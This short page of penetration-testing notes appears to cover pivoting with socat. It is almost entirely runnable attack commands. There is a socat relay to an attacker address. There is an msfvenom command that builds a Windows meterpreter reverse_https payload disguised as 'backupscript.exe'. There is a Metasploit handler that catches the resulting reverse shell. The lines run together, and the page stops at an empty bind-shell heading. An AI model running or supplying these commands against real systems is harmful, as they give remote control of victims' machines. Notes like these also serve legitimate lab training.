Playing Pong with Socat
Socat Redirection with a Reverse Shell
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080sudo msfconsole
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
runSocat Redirection with a Bind Shell

Last updated